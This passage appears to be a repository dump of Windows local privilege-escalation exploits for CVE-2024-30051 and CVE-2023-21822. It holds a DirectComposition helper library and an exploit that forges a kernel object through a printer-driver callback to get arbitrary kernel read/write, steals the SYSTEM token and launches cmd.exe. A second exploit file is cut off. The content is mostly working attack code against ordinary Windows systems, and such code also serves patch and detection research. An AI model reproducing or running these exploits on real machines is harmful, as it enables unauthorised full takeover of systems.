m_stream.write(std::move(cmd)); 45 | }; 46 | bool dcomp_channel_t::setFloatProperty(UINT32 dwIndex, UINT32 dwPropertyId, FLOAT dqPropertyValue) { 47 | dcomp_command_set_resource_float_property_t cmd = {0 ,0, 0, 0}; 48 | 49 | cmd.Id = (UINT32)dcomp_command_id_t::SetResourceFloatProperty; 50 | cmd.Index = dwIndex; 51 | cmd.PropertyId = dwPropertyId; 52 | cmd.PropertyValue = dqPropertyValue; 53 | 54 | return m_stream.write(std::move(cmd)); 55 | }; 56 | bool dcomp_channel_t::setReferenceProperty(UINT32 dwIndex, UINT32 dwPropertyId, UINT32 dwPropertyValue) { 57 | dcomp_command_set_resource_reference_property_t cmd = {0 ,0, 0, 0}; 58 | cmd.Id = (UINT32)dcomp_command_id_t::SetResourceReferenceProperty; 59 | cmd.Index = dwIndex; 60 | cmd.PropertyId = dwPropertyId; 61 | cmd.PropertyValue = dwPropertyValue; 62 | 63 | return m_stream.write(std::move(cmd)); 64 | }; 65 | bool dcomp_channel_t::setBufferProperty(UINT32 dwIndex, UINT32 dqPropertyId, PVOID buffer, SIZE_T size) { 66 | auto dyn_cmd_size = sizeof(dcomp_command_set_resource_buffer_property_t) - 1 + size; 67 | auto dyn_mem = new UINT8[dyn_cmd_size]; 68 | auto* dyn_cmd = (dcomp_command_set_resource_buffer_property_t*)(dyn_mem); 69 | 70 | dyn_cmd->Id = (UINT32)dcomp_command_id_t::SetResourceBufferProperty; 71 | dyn_cmd->Index = dwIndex; 72 | dyn_cmd->PropertyId = dqPropertyId; 73 | dyn_cmd->ArraySize = (UINT32)(size); 74 | 75 | memcpy(&dyn_cmd->Array, buffer, size); 76 | 77 | auto r = m_stream.writeData( 78 | dyn_cmd, dyn_cmd_size 79 | ); 80 | 81 | dyn_cmd = nullptr; 82 | 83 | delete[] dyn_mem; 84 | 85 | return r; 86 | }; 87 | bool dcomp_channel_t::setReferenceArrayProperty(UINT32 dwIndex, UINT32 dqPropertyId, UINT32 dwIndice[], SIZE_T szIndices) { 88 | auto dyn_cmd_size = sizeof(dcomp_command_set_resource_reference_array_property_t) - sizeof(UINT32) + szIndices * sizeof(UINT32); 89 | auto dyn_mem = new UINT8[dyn_cmd_size]; 90 | auto* dyn_cmd = (dcomp_command_set_resource_reference_array_property_t*)(dyn_mem); 91 | 92 | dyn_cmd->Id = (UINT32)dcomp_command_id_t::SetResourceReferenceArrayProperty; 93 | dyn_cmd->Index = dwIndex; 94 | dyn_cmd->PropertyId = dqPropertyId; 95 | dyn_cmd->ArraySize = (UINT32)(szIndices); 96 | 97 | memcpy(&dyn_cmd->Array, dwIndice, szIndices * sizeof(UINT32)); 98 | 99 | auto r = m_stream.writeData( 100 | dyn_cmd, dyn_cmd_size 101 | ); 102 | dyn_cmd = nullptr; 103 | 104 | delete[] dyn_mem; 105 | 106 | return r; 107 | }; 108 | bool dcomp_channel_t::addVisualChild(UINT32 dwIndex, UINT32 dwIndexChild, UINT32 dwMode, UINT32 dwAdditionalIndex) { 109 | dcomp_command_add_visual_child_t cmd = {0 ,0, 0, 0, 0}; 110 | constexpr auto cmd_size = sizeof(dcomp_command_add_visual_child_t); 111 | 112 | cmd.Id = (UINT32)dcomp_command_id_t::AddVisualChild; 113 | cmd.Index = dwIndex; 114 | cmd.IndexChild = dwIndexChild; 115 | cmd.Mode = dwMode; 116 | cmd.AdditionalIndex = dwAdditionalIndex; 117 | 118 | return m_stream.write(std::move(cmd)); 119 | }; 120 | 121 | bool dcomp_channel_t::releaseResource(UINT32 dwIndex) { 122 | dcomp_command_release_resource_t cmd = {0, 0}; 123 | constexpr auto cmd_size = sizeof(dcomp_command_release_resource_t); 124 | 125 | cmd.Id = (UINT32)dcomp_command_id_t::ReleaseResource; 126 | cmd.Index = dwIndex; 127 | 128 | return m_stream.write(std::move(cmd)); 129 | }; 130 | bool dcomp_channel_t::commit() { 131 | DWORD out1; 132 | BOOL out2; 133 | BOOL in1 = FALSE; 134 | 135 | auto ntstatus = (*ponylib::win32u::kNtDCompositionCommitChannel)( 136 | m_hch, &out1, &out2, in1, NULL, NULL, NULL, NULL 137 | ); 138 | if (!NT_SUCCESS(ntstatus)) { 139 | m_error = ntstatus; 140 | return false; 141 | } 142 | return true; 143 | }; 144 | bool dcomp_channel_t::process() { 145 | DWORD dwArg1, dwArg2 = NULL; 146 | 147 | auto status = (*ponylib::win32u::kNtDCompositionProcessChannelBatchBuffer)( 148 | m_hch, 149 | m_stream.pos(), 150 | &dwArg1, 151 | &dwArg2 152 | ); 153 | 154 | if (!NT_SUCCESS(status)) { 155 | m_error = status; 156 | return false; 157 | } 158 | 159 | m_stream.erase(); 160 | 161 | return true; 162 | }; 163 | bool dcomp_channel_t::apply() { 164 | auto r = process(); 165 | if (!r) 166 | return r; 167 | return commit(); 168 | }; 169 | 170 | 171 | dcomp_shared_section_t::dcomp_shared_section_t(dcomp_channel_t* pch, UINT32 dwIndex, UINT32 dwTypeId, SIZE_T size): 172 | m_ch(pch), 173 | m_index(dwIndex), 174 | m_typeId(dwTypeId), 175 | m_size(size) , 176 | m_error(0), 177 | m_pMapped(0) { 178 | if ( !m_ch->createResource(m_typeId, m_index, 0) ) { 179 | m_error = pch->error(); 180 | return; 181 | } 182 | if ( !m_ch->process() ) { 183 | m_error = pch->error(); 184 | return; 185 | } 186 | if ( !m_ch->commit() ) { 187 | m_error = pch->error(); 188 | return; 189 | } 190 | 191 | auto ntstatus = (*ponylib::win32u::kNtDCompositionCreateAndBindSharedSection)(pch->hch(), m_index, m_size, &m_hSection); 192 | if (!NT_SUCCESS(ntstatus)) { 193 | m_error = ntstatus; 194 | return; 195 | } 196 | 197 | ntstatus = (*ponylib::nt::kNtMapViewOfSection)( 198 | m_hSection, 199 | GetCurrentProcess(), 200 | &m_pMapped, 201 | NULL, 202 | NULL, 203 | NULL, 204 | &size, 205 | 2, // ViewUnmap 206 | NULL, 207 | PAGE_READWRITE 208 | ); 209 | if ( !NT_SUCCESS(ntstatus) ) { 210 | m_error = ntstatus; 211 | return; 212 | } 213 | }; 214 | 215 | dcomp_shared_section_t::~dcomp_shared_section_t() { 216 | if (m_error != 0) { 217 | return; 218 | } 219 | 220 | if (m_pMapped) { 221 | (*ponylib::nt::kNtUnmapViewOfSection)(GetCurrentProcess(), m_pMapped); 222 | } 223 | 224 | m_ch->releaseResource(m_index); 225 | } -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/nt.h: -------------------------------------------------------------------------------- 1 | #ifndef _PONYLIB_NT 2 | #define _PONYLIB_NT 3 | 4 | #include "ponylib.h" 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | namespace ponylib::nt { 13 | /* 14 | NT API Proxies 15 | */ 16 | using nt_map_view_of_section_t = system_function_t< 17 | NTSTATUS (NTAPI*)( 18 | HANDLE SectionHandle, 19 | HANDLE ProcessHandle, 20 | PVOID *BaseAddress, 21 | ULONG_PTR ZeroBits, 22 | SIZE_T CommitSize, 23 | PLARGE_INTEGER SectionOffset, 24 | PSIZE_T ViewSize, 25 | DWORD InheritDisposition, 26 | ULONG AllocationType, 27 | ULONG Win32Protect 28 | ) 29 | >; 30 | using nt_query_system_information_t = system_function_t< 31 | NTSTATUS(NTAPI*)( 32 | ULONG SystemInformationClass, 33 | PVOID SystemInformation, 34 | ULONG SystemInformationLength, 35 | PULONG ReturnLength 36 | ) 37 | >; 38 | using nt_unmap_view_of_section_t = system_function_t< 39 | NTSTATUS(NTAPI*)( 40 | HANDLE ProcessHandle, 41 | PVOID BaseAddress 42 | ) 43 | >; 44 | 45 | /* 46 | NT API Proxies constants 47 | */ 48 | extern nt_map_view_of_section_t kNtMapViewOfSection; 49 | extern nt_unmap_view_of_section_t kNtUnmapViewOfSection; 50 | extern nt_query_system_information_t kNtQuerySystemInformation; 51 | 52 | 53 | /* 54 | NT API Structs & Typedefs 55 | 56 | SYSTEM_PROCESS_INFORMATION, UNICODE_STRING, KPRIORITY, SYSTEM_THREAD_INFORMATION, SYSTEM_INFORMATION_CLASS taken from Scylla 57 | - https://github.com/NtQuery/Scylla/blob/master/Scylla/NativeWinApi.h 58 | */ 59 | typedef LONG KPRIORITY; 60 | typedef struct _UNICODE_STRING { 61 | USHORT Length; 62 | USHORT MaximumLength; 63 | PWSTR Buffer; 64 | } UNICODE_STRING, *PUNICODE_STRING; 65 | typedef struct _CLIENT_ID{ 66 | HANDLE UniqueProcess; 67 | HANDLE UniqueThread; 68 | } CLIENT_ID, *PCLIENT_ID; 69 | typedef struct _SYSTEM_THREAD_INFORMATION 70 | { 71 | LARGE_INTEGER KernelTime; 72 | LARGE_INTEGER UserTime; 73 | LARGE_INTEGER CreateTime; 74 | ULONG WaitTime; 75 | PVOID StartAddress; 76 | CLIENT_ID ClientId; 77 | KPRIORITY Priority; 78 | LONG BasePriority; 79 | ULONG ContextSwitches; 80 | ULONG ThreadState; 81 | ULONG WaitReason; 82 | } SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; 83 | typedef struct _SYSTEM_PROCESS_INFORMATION 84 | { 85 | ULONG NextEntryOffset; 86 | ULONG NumberOfThreads; 87 | LARGE_INTEGER SpareLi1; 88 | LARGE_INTEGER SpareLi2; 89 | LARGE_INTEGER SpareLi3; 90 | LARGE_INTEGER CreateTime; 91 | LARGE_INTEGER UserTime; 92 | LARGE_INTEGER KernelTime; 93 | UNICODE_STRING ImageName; 94 | KPRIORITY BasePriority; 95 | HANDLE UniqueProcessId; 96 | HANDLE InheritedFromUniqueProcessId; 97 | ULONG HandleCount; 98 | ULONG SessionId; 99 | ULONG_PTR PageDirectoryBase; 100 | SIZE_T PeakVirtualSize; 101 | SIZE_T VirtualSize; 102 | ULONG PageFaultCount; 103 | SIZE_T PeakWorkingSetSize; 104 | SIZE_T WorkingSetSize; 105 | SIZE_T QuotaPeakPagedPoolUsage; 106 | SIZE_T QuotaPagedPoolUsage; 107 | SIZE_T QuotaPeakNonPagedPoolUsage; 108 | SIZE_T QuotaNonPagedPoolUsage; 109 | SIZE_T PagefileUsage; 110 | SIZE_T PeakPagefileUsage; 111 | SIZE_T PrivatePageCount; 112 | LARGE_INTEGER ReadOperationCount; 113 | LARGE_INTEGER WriteOperationCount; 114 | LARGE_INTEGER OtherOperationCount; 115 | LARGE_INTEGER ReadTransferCount; 116 | LARGE_INTEGER WriteTransferCount; 117 | LARGE_INTEGER OtherTransferCount; 118 | SYSTEM_THREAD_INFORMATION Threads[1]; 119 | } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; 120 | typedef enum _SYSTEM_INFORMATION_CLASS { 121 | SystemBasicInformation, 122 | SystemProcessorInformation, 123 | SystemPerformanceInformation, 124 | SystemTimeOfDayInformation, 125 | SystemPathInformation, 126 | SystemProcessInformation, 127 | SystemCallCountInformation, 128 | SystemDeviceInformation, 129 | SystemProcessorPerformanceInformation, 130 | SystemFlagsInformation, 131 | SystemCallTimeInformation, 132 | SystemModuleInformation, 133 | SystemLocksInformation, 134 | SystemStackTraceInformation, 135 | SystemPagedPoolInformation, 136 | SystemNonPagedPoolInformation, 137 | SystemHandleInformation, 138 | SystemObjectInformation, 139 | SystemPageFileInformation, 140 | SystemVdmInstemulInformation, 141 | SystemVdmBopInformation, 142 | SystemFileCacheInformation, 143 | SystemPoolTagInformation, 144 | SystemInterruptInformation, 145 | SystemDpcBehaviorInformation, 146 | SystemFullMemoryInformation, 147 | SystemLoadGdiDriverInformation, 148 | SystemUnloadGdiDriverInformation, 149 | SystemTimeAdjustmentInformation, 150 | SystemSummaryMemoryInformation, 151 | SystemNextEventIdInformation, 152 | SystemEventIdsInformation, 153 | SystemCrashDumpInformation, 154 | SystemExceptionInformation, 155 | SystemCrashDumpStateInformation, 156 | SystemKernelDebuggerInformation, 157 | SystemContextSwitchInformation, 158 | SystemRegistryQuotaInformation, 159 | SystemExtendServiceTableInformation, 160 | SystemPrioritySeperation, 161 | SystemPlugPlayBusInformation, 162 | SystemDockInformation, 163 | SystemPowerInformation2, 164 | SystemProcessorSpeedInformation, 165 | SystemCurrentTimeZoneInformation, 166 | SystemLookasideInformation 167 | } SYSTEM_INFORMATION_CLASS; 168 | 169 | /* 170 | NT API Utils Impls 171 | */ 172 | typedef struct _process_t { 173 | UINT32 processId; 174 | UINT32 sessionId; 175 | 176 | UINT64 imagebase; 177 | UINT64 imagesize; 178 | 179 | UINT64 peb; 180 | 181 | std::wstring filename; 182 | std::wstring fullpath; 183 | 184 | } process_t,*ptr_process_t; 185 | class proc_snapshot_t { 186 | protected: 187 | std::vector m_processes; 188 | 189 | public: 190 | proc_snapshot_t() {} 191 | 192 | NTSTATUS build() { 193 | m_processes.clear(); 194 | 195 | auto hHeap = GetProcessHeap(); 196 | 197 | ULONG returnLength = 0; 198 | ULONG bufferLength = 0x1000; 199 | PSYSTEM_PROCESS_INFORMATION pBuffer = (PSYSTEM_PROCESS_INFORMATION)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, bufferLength); 200 | 201 | NTSTATUS status = (*kNtQuerySystemInformation)(SystemProcessInformation, pBuffer, bufferLength, &returnLength); 202 | while (status == 0xC0000004) { 203 | HeapFree(hHeap, 0, pBuffer); 204 | bufferLength += 0x1000; 205 | 206 | pBuffer = (PSYSTEM_PROCESS_INFORMATION)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, bufferLength); 207 | 208 | status = (*kNtQuerySystemInformation)(SystemProcessInformation, pBuffer, bufferLength, &returnLength); 209 | } 210 | if ( !NT_SUCCESS(status) ) { 211 | HeapFree(hHeap, 0, pBuffer); 212 | 213 | return status; 214 | } 215 | 216 | PSYSTEM_PROCESS_INFORMATION pIter = pBuffer; 217 | while(TRUE) { 218 | if (pIter->UniqueProcessId > (HANDLE)4) { 219 | 220 | std::wstring imageName(pIter->ImageName.Buffer); 221 | std::wstring imageFullName; 222 | 223 | m_processes.push_back( 224 | process_t { 225 | (UINT32) (pIter->UniqueProcessId), 226 | (UINT32) pIter->SessionId, 227 | (UINT64) 0, 228 | (UINT64) 0, 229 | (UINT64) 0, 230 | imageName, 231 | imageFullName 232 | } 233 | ); 234 | } 235 | 236 | if (pIter->NextEntryOffset == 0) 237 | { 238 | break; 239 | } 240 | else 241 | { 242 | pIter = (PSYSTEM_PROCESS_INFORMATION)((DWORD_PTR)pIter + (DWORD_PTR)pIter->NextEntryOffset); 243 | } 244 | } 245 | 246 | return 0; 247 | } 248 | 249 | process_t& at(int i) { 250 | return m_processes.at(i); 251 | } 252 | 253 | std::vector filter(std::function fn) { 254 | std::vector filtered; 255 | std::copy_if( 256 | m_processes.begin(), 257 | m_processes.end(), 258 | std::back_inserter(filtered), 259 | fn 260 | ); 261 | return filtered; 262 | }; 263 | }; 264 | } 265 | 266 | 267 | #endif // _PONYLIB_NT -------------------------------------------------------------------------------- /cve-2023-21822/main.cpp: -------------------------------------------------------------------------------- 1 | #ifndef UNICODE 2 | #define UNICODE 3 | #endif 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #include "umpd.h" 12 | #include "nt.h" 13 | 14 | #define PRINTER_NAME L"Microsoft XPS Document Writer" 15 | #define INIT() LoadLibraryA("user32.dll") 16 | 17 | #define OBJ_SET_QWORD(obj, offset, value) *(ULONG64*)( (PBYTE)(obj) + offset ) = (ULONG64)(value) 18 | #define OBJ_GET_QWORD(obj, offset) *(ULONG64*)( (PBYTE)(obj) + offset ) 19 | #define OBJ_SET_DWORD(obj, offset, value) *(ULONG32*)( (PBYTE)(obj) + offset ) = (ULONG32)(value) 20 | #define FAKE_OBJ_SET_VTABLE(obj, offset, value) *(ULONG64*)( (PBYTE)( *(ULONG64*)( (PBYTE)(obj) + 0 ) ) + offset ) = (ULONG64)(value) 21 | #define OBJ_LEA(obj, offset) (PVOID)( (PBYTE)(obj) + offset ) 22 | 23 | typedef HBITMAP (NTAPI* FuncTy_NtGdiEngCreateDeviceBitmap) ( 24 | DHSURF dhsurf, 25 | tagSIZE sizl, 26 | FLONG fl 27 | ); 28 | 29 | typedef BOOL (NTAPI* FuncTy_NtGdiEngStretchBltROP)( 30 | SURFOBJ *psoDest, 31 | SURFOBJ *psoSrc, 32 | SURFOBJ *psoMask, 33 | CLIPOBJ *pco, 34 | XLATEOBJ *pxlo, 35 | COLORADJUSTMENT *pca, 36 | POINTL *pptlHTOrg, 37 | RECTL *prclDest, 38 | RECTL *prclSrc, 39 | POINTL *pptlMask, 40 | ULONG iMode, 41 | BRUSHOBJ *pbo, 42 | DWORD rop4 43 | ); 44 | 45 | FuncTy_NtGdiEngCreateDeviceBitmap NtGdiEngCreateDeviceBitmap = NULL; 46 | FuncTy_NtGdiEngStretchBltROP NtGdiEngStretchBltROP = NULL; 47 | 48 | 49 | HDC g_hdc = NULL; 50 | My_UMSO g_UmsoDest; 51 | My_UMSO g_UmsoSrc; 52 | 53 | PVOID g_pFakeObj = NULL; 54 | 55 | PVOID g_kFn = NULL; 56 | 57 | const CHAR const_kernel_name[] = "win32kfull.sys"; 58 | const UINT64 const_rva_Fn = 0x2c9740; // rva of vSrcCopyS16D16Identity 59 | 60 | int system() 61 | { 62 | SECURITY_ATTRIBUTES sa; 63 | HANDLE hRead, hWrite; 64 | byte buf[40960] = { 0 }; 65 | STARTUPINFOW si; 66 | PROCESS_INFORMATION pi; 67 | DWORD bytesRead; 68 | RtlSecureZeroMemory(&si, sizeof(si)); 69 | RtlSecureZeroMemory(&pi, sizeof(pi)); 70 | RtlSecureZeroMemory(&sa, sizeof(sa)); 71 | int br = 0; 72 | sa.nLength = sizeof(SECURITY_ATTRIBUTES); 73 | sa.lpSecurityDescriptor = NULL; 74 | sa.bInheritHandle = TRUE; 75 | if (!CreatePipe(&hRead, &hWrite, &sa, 0)) 76 | { 77 | printf("[!][system] CreatePipe(): Failed with %llx\n", GetLastError()); 78 | return -3; 79 | } 80 | 81 | si.cb = sizeof(STARTUPINFO); 82 | GetStartupInfoW(&si); 83 | si.hStdError = hWrite; 84 | si.hStdOutput = hWrite; 85 | si.lpDesktop = L"WinSta0\\Default"; 86 | wchar_t cmd[4096] = { L"cmd.exe" }; 87 | 88 | if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) 89 | { 90 | CloseHandle(hWrite); 91 | CloseHandle(hRead); 92 | printf("[!][system] CreateProcessW(): Failed with %llx\n", GetLastError()); 93 | return -2; 94 | } 95 | CloseHandle(hWrite); 96 | 97 | } 98 | 99 | BOOL init_kernel_addresses() { 100 | 101 | ptr_My_SYSTEM_MODULE_INFORMATION lpInfo = NULL; 102 | if (GetModulesInfo(&lpInfo) < 0) { 103 | return FALSE; 104 | } 105 | 106 | for (int i = 0; i < lpInfo->ModulesCount; i++) { 107 | ptr_My_SYSTEM_MODULE lpModule = &lpInfo->Modules[i]; 108 | 109 | if (!strcmp(&lpModule->Name[lpModule->NameOffset], const_kernel_name)) { 110 | g_kFn = (PVOID)((UINT64)(lpModule->ImageBaseAddress) + const_rva_Fn); 111 | return TRUE; 112 | } 113 | }; 114 | 115 | return FALSE; 116 | }; 117 | 118 | PVOID init_fake_obj() { 119 | 120 | PBYTE lpFakeObj = (PBYTE)VirtualAlloc(NULL, 0x4000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 121 | 122 | memset(lpFakeObj, 0xCC, 0x1000); 123 | 124 | 125 | OBJ_SET_QWORD(lpFakeObj, 0xB8, NULL); // disable EngAcquireSemaphore 126 | OBJ_SET_QWORD(lpFakeObj, 0x00, OBJ_LEA(lpFakeObj, 0x1000) ); // set vtable points to our start of fake object 127 | 128 | OBJ_SET_DWORD(lpFakeObj, 0x80, 0xCC | 0x21); // allow CDDMULTIBITMAPLOCK::CDDMULTIBITMAPLOCK 129 | // to call function from vtable CddBitmapHw::SyncDXAccessInternal 130 | OBJ_SET_QWORD(lpFakeObj, 0x28, NULL); 131 | 132 | return lpFakeObj; 133 | } 134 | 135 | BOOL init() { 136 | if (!init_kernel_addresses()) 137 | return FALSE; 138 | 139 | HWND HelperWindow = CreateWindowEx(WS_EX_TOOLWINDOW, L"BUTTON", NULL, 140 | WS_VISIBLE | WS_POPUP | WS_BORDER | WS_DISABLED, 141 | 0, 0, 50, 50, NULL, NULL, GetModuleHandle(0), NULL); 142 | HDC HelperWindowDCScr = GetWindowDC(HelperWindow); // That screen related HBITMAP allow us reach cdd module 143 | FillMemory(&g_UmsoDest, sizeof(g_UmsoDest), 0); 144 | g_UmsoDest.hsurf = (HBITMAP)GetCurrentObject(HelperWindowDCScr, OBJ_BITMAP); 145 | g_UmsoDest.magic = 0x554D534F; 146 | 147 | g_pFakeObj = init_fake_obj(); 148 | FAKE_OBJ_SET_VTABLE(g_pFakeObj, 0xB0, g_kFn); 149 | 150 | FillMemory(&g_UmsoSrc, sizeof(My_UMSO), 0); 151 | g_UmsoSrc.hsurf = (HBITMAP)NtGdiEngCreateDeviceBitmap((DHSURF)g_pFakeObj, {100, 100}, BMF_1BPP);; 152 | g_UmsoSrc.magic = 0x554D534F; 153 | 154 | wprintf(L"[?][init] g_kReadFn = %p\n", g_kFn); 155 | wprintf(L"[?][init] g_pFakeObj = %p\n", g_pFakeObj); 156 | wprintf(L"[?][init] hScreenBitmap = %x\n", g_UmsoDest.hsurf); 157 | wprintf(L"[?][init] hBitmap = %x\n", g_UmsoSrc.hsurf); 158 | 159 | return TRUE; 160 | } 161 | 162 | VOID memmove(PVOID dst, PVOID src, SIZE_T size) { 163 | 164 | OBJ_SET_QWORD(g_pFakeObj, 0x08, src); 165 | OBJ_SET_QWORD(g_pFakeObj, 0x10, dst); 166 | OBJ_SET_DWORD(g_pFakeObj, 0x1C, size / 2); // x2 167 | 168 | OBJ_SET_DWORD(g_pFakeObj, 0x30, 0x00); 169 | OBJ_SET_DWORD(g_pFakeObj, 0x38, 0x00); 170 | 171 | OBJ_SET_DWORD(g_pFakeObj, 0x40, 0x00); // if ( *(_DWORD *)(a1 + 0x40) ) 172 | OBJ_SET_DWORD(g_pFakeObj, 0x18, 0x00); // disable if ( *(int *)(a1 + 0x18) < 0 ) 173 | 174 | OBJ_SET_DWORD(g_pFakeObj, 0x20, 0x01); // if ( !--v3 ) 175 | // break; 176 | 177 | RECTL rclDest; 178 | RECTL rclSrc; 179 | 180 | rclDest.left = 0; 181 | rclDest.top = 0; 182 | rclDest.right = 10; 183 | rclDest.bottom = 10; 184 | 185 | rclSrc.left = 0; 186 | rclSrc.top = 0; 187 | rclSrc.right = 20; 188 | rclSrc.bottom = 20; 189 | 190 | POINTL pSrc = {2, 3}; 191 | 192 | NtGdiEngStretchBltROP( 193 | &g_UmsoDest.so, &g_UmsoSrc.so, NULL, NULL, NULL, NULL, NULL, 194 | &rclDest, &rclSrc, NULL, COLORONCOLOR, NULL, 0xCCCC 195 | ); 196 | 197 | OBJ_SET_DWORD(g_pFakeObj, 0x80, 0x21); // after complete CDDMULTIBITMAPLOCK::CDDMULTIBITMAPLOCK flag will be flushed 198 | // recover it 199 | }; 200 | 201 | PVOID Read_64(PVOID address) { 202 | 203 | memmove(OBJ_LEA(g_pFakeObj, 0x2000), address, 8); 204 | 205 | return (PVOID)OBJ_GET_QWORD(g_pFakeObj, 0x2000); 206 | }; 207 | 208 | VOID Write_64(PVOID address, ULONG64 value) { 209 | OBJ_SET_QWORD(g_pFakeObj, 0x2000, value); 210 | 211 | memmove(address, OBJ_LEA(g_pFakeObj, 0x2000), 8); 212 | }; 213 | 214 | PVOID Read_kThread() { 215 | return Read_64(OBJ_LEA(g_pFakeObj, 0x210)); 216 | }; 217 | 218 | INT umpd_cb_escape(VOID *inputBuf, ULONGLONG inputBufSize, VOID *outputBuffer, ULONGLONG outputBufSize) { 219 | wprintf(L"[?][umpd_cb_escape][tid=%x]: STARTED \n", GetCurrentThreadId()); 220 | 221 | PVOID kThread = Read_kThread(); 222 | wprintf(L"[?][umpd_cb_escape][tid=%x]: kThread = %p\n", GetCurrentThreadId(), kThread); 223 | 224 | PVOID kProcess = Read_64(OBJ_LEA(kThread, 0x220)); 225 | wprintf(L"[?][umpd_cb_escape][tid=%x]: kProcess = %p\n", GetCurrentThreadId(), kProcess); 226 | 227 | PVOID kActiveLinks = Read_64(OBJ_LEA(kProcess, 0x448)); 228 | wprintf(L"[?][umpd_cb_escape][tid=%x]: kActiveLinks = %p\n", GetCurrentThreadId(), kActiveLinks); 229 | 230 | PVOID kP = kActiveLinks; 231 | do { 232 | kP = Read_64(OBJ_LEA(kP, 0x08)); 233 | 234 | ULONG64 pid = (ULONG64)Read_64(OBJ_LEA(kP, -0x08)); 235 | 236 | if (pid == 4) { 237 | PVOID kSystemToken = Read_64(OBJ_LEA(kP, 0x70)); 238 | 239 | wprintf(L"[?][umpd_cb_escape][tid=%x]: kSystemToken=%p\n", GetCurrentThreadId(), kSystemToken); 240 | 241 | Write_64(OBJ_LEA(kProcess, 0x4b8), (ULONG64)kSystemToken); 242 | 243 | wprintf(L"[?][umpd_cb_escape][tid=%x]: Token stolen\n", GetCurrentThreadId()); 244 | break; 245 | } 246 | } while (kP != kProcess); 247 | 248 | wprintf(L"[?][umpd_cb_escape][tid=%x]: COMPLETED \n", GetCurrentThreadId()); 249 | 250 | return TRUE; 251 | }; 252 | 253 | int 254 | __cdecl 255 | wmain( 256 | int argc, 257 | __in_ecount(argc) wchar_t* argv[]) 258 | { 259 | INIT(); 260 | 261 | wprintf(L"[?][main] PID=%x\n", GetCurrentProcessId()); 262 | wprintf(L"[?][main] TID=%x\n", GetCurrentThreadId()); 263 | system("pause"); 264 | 265 | NtGdiEngCreateDeviceBitmap = (FuncTy_NtGdiEngCreateDeviceBitmap)GetProcAddress( 266 | LoadLibraryW(L"win32u.dll"), "NtGdiEngCreateDeviceBitmap" 267 | ); 268 | NtGdiEngStretchBltROP = (FuncTy_NtGdiEngStretchBltROP)GetProcAddress( 269 | LoadLibraryW(L"win32u.dll"), "NtGdiEngStretchBltROP" 270 | ); 271 | 272 | HANDLE hPrinter = NULL; 273 | LPWSTR driverFilepath = NULL; 274 | HMODULE driverDLL = NULL; 275 | 276 | if (!umpd_load_printer_dll(PRINTER_NAME, hPrinter, driverFilepath, driverDLL)) { 277 | wprintf(L"[~][main] Failed to load printer driver\n"); 278 | return -1; 279 | } 280 | 281 | wprintf(L"[?][main] hPrinter = %llx\n", (ULONGLONG)hPrinter); 282 | wprintf(L"[?][main] PrinterName = %s\n", PRINTER_NAME); 283 | wprintf(L"[?][main] UMPD_Driver = %s\n", driverFilepath); 284 | wprintf(L"[?][main] UMPD_DriverDLL = %llx\n", (ULONGLONG)driverDLL); 285 | 286 | if (!umpd_set_gdi_hooks()) { 287 | wprintf(L"[~][main] Failed to set gdi hook\n"); 288 | return -2; 289 | } 290 | 291 | umpd_set_cb(INDEX_DrvEscape, umpd_cb_escape); 292 | 293 | init(); 294 | 295 | g_hdc = CreateDC(PRINTER_NAME, PRINTER_NAME, NULL, NULL); 296 | 297 | system(); 298 | 299 | return 0; 300 | } -------------------------------------------------------------------------------- /cve-2024-30051/src/exploit.cpp: -------------------------------------------------------------------------------- 1 | #define _CRT_SECURE_NO_WARNINGS 2 | #ifndef UNICODE 3 | #define UNICODE 4 | #endif 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | 15 | #include "ponylib/nt.h" 16 | #include "ponylib/win32u.h" 17 | #include "ponylib/memory.h" 18 | 19 | #include "dcomp.h" 20 | 21 | 22 | #define INIT() LoadLibraryA("user32.dll") 23 | 24 | #define ClassName L"I0p_Window" 25 | #define WindowTitle L"I0p_Window_Title" 26 | 27 | #define DCompResourceSurfaceBrushMarshaler 180 28 | #define DCompResourcePrimitiveGroupLayerClipMarshaler 128 29 | #define DCompResourceSharedSectionMarshaler 169 30 | #define DCompResourceSpriteVisualMarshaler 178 31 | #define DCompResourceLegacyRenderTargetMarshaler 94 32 | #define DCompResourceVisualTargetMarshaler 201 33 | #define DCompResourceVisualMarshaler 195 34 | #define DCompResourceCompositionGlyphRunMarshaler 33 35 | #define DCompResourceCompositionSurfaceBitmapMarshaler 40 36 | #define DCompResourceCManipulationMarshaler 103 // - 37 | #define DCompResourceCaptureControllerMarshaler 16 // - 38 | #define DCompResourceCVisualCaptureMarshaler 196 // - 39 | #define DCompResourceCInteractionMarshaler 87 // 40 | 41 | #define VisualTargetRootVisual 13 42 | 43 | #pragma pack(push, 1) 44 | struct My_MilRectD { 45 | float left; 46 | float top; 47 | float right; 48 | float bottom; 49 | }; 50 | struct My_CPrimitiveGroupBatchHeader{ 51 | ULONG32 field_0; 52 | ULONG32 field_4 ; 53 | ULONG32 field_8 ; 54 | ULONG32 field_C ; 55 | ULONG32 field_10; 56 | ULONG32 field_14; 57 | ULONG32 field_18; 58 | ULONG32 field_1C; 59 | ULONG32 field_20; 60 | ULONG32 field_24; 61 | ULONG32 field_28; 62 | ULONG32 field_2C; 63 | ULONG32 field_30; 64 | ULONG32 field_34; 65 | ULONG32 field_38; 66 | }; 67 | #pragma pack(pop) 68 | 69 | BOOL get_version_info(DWORD& dwBuildNumber, DWORD& dwMinorVersion, DWORD& dwMajorVersion) { 70 | OSVERSIONINFOEXW osinfo; 71 | 72 | NTSTATUS(WINAPI *RtlGetVersion)(LPOSVERSIONINFOEXW); 73 | 74 | *(FARPROC*)&RtlGetVersion = GetProcAddress(GetModuleHandleA("ntdll"), "RtlGetVersion"); 75 | 76 | if (NULL == RtlGetVersion) { 77 | return FALSE; 78 | } 79 | 80 | osinfo.dwOSVersionInfoSize = sizeof(osinfo); 81 | RtlGetVersion(&osinfo); 82 | 83 | dwBuildNumber = 